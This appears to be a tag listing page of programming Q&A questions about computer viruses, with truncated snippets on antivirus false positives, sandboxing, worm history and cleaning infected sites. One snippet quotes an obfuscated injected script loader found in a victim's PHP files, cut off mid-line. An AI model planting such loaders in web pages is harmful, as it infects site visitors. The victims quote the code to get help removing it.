virus

Protect IE6 from exploits when testing?

I wrote an app in C# which uses the webbrowser control. While using it, the site i happen to use it on had an ad that auto DLed and ran itself on my comp causing me to be very annoyed. According to safebrowsing.clients.google.com 2/5000 pages had this exploit, unlucky me. I use IE6 for testing so what can i do to protect myself from tho...

Bash Script to remove iframe virus

I want a bash script to read all files recursively in a directory and remove some code (i.e a iframe virus) from it and save back the orignal file. ...

a virus in my visual c++ 2008?

Hey, so after a few months with JavaScript I decided to head back to my sweet c++. I started a new project and for the fun of it tried to compile the default file the comes up. now, everything looks weird already. the 'create project' wizard doesn't look how I remembered it. heck, even the main function is written differently now: #inc...

Is a "Virus Free" or "Spyware Free" Certification Standard Practice For New Businesses?

I have seen several shareware sites that feature "virus free", and "spyware free" certified logos. I am planning on marketing my software for profit, but would it be worthwhile to get some sort of certification logo on the download page for my software? A company called International Charter offers something called a "safe download" ce...

How viruses get through browser to pc as JavaScript do not have much privileges ?

I would like to know how browser allow viruses to pass through to our computers. Response we receive is a text response.. Only executable thing in the response is JavaScript which does not have much privileges, what makes browser favor certain files to be passed to computer? ...

storing files as byte array in db, security risk?

We have an asp.net application that allows users to upload files, the files are saved to temporary disk location and later attached to a record and saved in DB. My question pertains to security and/or virus issues. Are there any security holes in this approach? Can a virus cause harm if it is never executed (file is saved, then open...

Does a Polymorphic engine have any other uses besides writing viruses?

Does a Polymorphic engine have any other uses besides writing viruses? ...

Is there a standout programming language to write a virus?

Hi, Just for curiosity; I wonder what is the most popular programming language to write a computer virus? May the most popular one could be considered as the most capable for manipulating vital data and sources? Thanks ...

Potentially dangerous Request.Form value - Exception

Hi, today I receive multiple (50->*) e-mails regarding: A potentially dangerous Request.Form value was detected from the client (ctl00$Content$InputStreet="OzgYPY <a href="http://effe..."). and A potentially dangerous Request.Form value was detected from the client (ctl00$Content$InputStreet="GVdtWm <a href="http://mxif..."). a...

Morris Internet Worm - anyone knows how did they manage to stop it?

Hi there, yes, this is a homework-type question but could you please help me out? In a very short presentation on the topic of Morris Internet Worm I am supposed to list the steps taken to stop the worm from spreading. My pp slides are now approaching the final state, but before I go and say that this or that is how they stopped the wo...

Django Development server, found something in console like virus?

I was running Django Development server, and found same access message shown up again and again: [03/Dec/2009 21:02:30] "GET http://222.186.27.9/R.asp?P=58.50.245.72:8000 HTTP/1.1" 500 717 Traceback (most recent call last): File "d:\www\lib\django\django\core\servers\basehttp.py", line 279, in run self.result = application(self.envi...

is it possible to automatically purge a Word document of all scripts and other malicious threats?

reputedly, it is possible to make a "malicious" Word document. Maybe using embedded VB script? Anyway, not sure. My question is, is it possible to make an app that safely scrubs all such insertions from a .doc file? Of course, preferably this app should work without actually opening that file in Word application since presumably that may...

Debugging what this LISP Virus is doing

My firm has been hit by an AutoCAD virus that is deleting and replacing our acaddoc.lsp with the routine below. I'm an architect and not exactly sure what this is doing by the repetitive "find" and "deletes". Questions What is this replacing the files with (currently searching for acadapq) ? Who writes a virus for AutoCAD?!?! ...

Virus in Delphi 7

When i compile a new project in Delphi 7 IDE , the MCafee identifies it as Virus and deletes it . The virus identified as Generic.dx!gmk and is deleted by the antivirus so no new Exe is created . How do we resolve this issue ? Is this a false positive ? ...

Making a simple assembly emulator

Dear All, I am working on project that is detecting unknown Viruses, so i am going to build my small emulator that emulates the assembly code of the executable so i can detect whether it is a virus or not by emulating it to virtual registers then observing what happens. so i need help in getting the code of every assembly instruction in...

Iframe malicious code in PHP files?

I found the following code in PHP files in my website. I think someone just able to hack my ftp or with some way he's able to add this script in my PHP files, don't know how. <script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@...

Execute a file in sandboxed environment and track it

I have a file that could possibly be a virus. I'd like to execute the file in some form of a sandboxed environment and trace what files it tries to modify or basically anything that it is trying to do. What software tools and knowledge do I need to do this? My system is windows 7. ...

Using PHP's IMAP library triggers Kaspersky's Antivirus

Hello, I just started today working with PHP's IMAP library, and while imap_fetchbody or imap_body are called, it is triggering my Kaspersky antivirus. The viruses are Trojan.Win32.Agent.dmyq and Trojan.Win32.FraudPack.aoda. I am running this off a local development machine with XAMPP and Kaspersky AV. Now, I am sure there are viruse...

My program is getting a false positive from AVG.

My program is getting a false positive from AVG. Its just our companies branded version of Ultra VNC. Its only this one company that's identifying it as a virus and we've been using the same copy of that program for almost a year. I know its possible to tell this Anti Virus program the VNC client is safe, but I can't do that for all of o...

Tiny C Compiler and Virus warnings...

I wanted to try out the TCC and got the Win32 Binary zip file from the website. upon decompressing it I tried to compile the "hello_win.c" source from the example directory. As soon as the compiler tried to write to the disk McAfee Popped up a dialog box and identified a Trojan named "Generic.dx." Has anyone else experience this? Drop...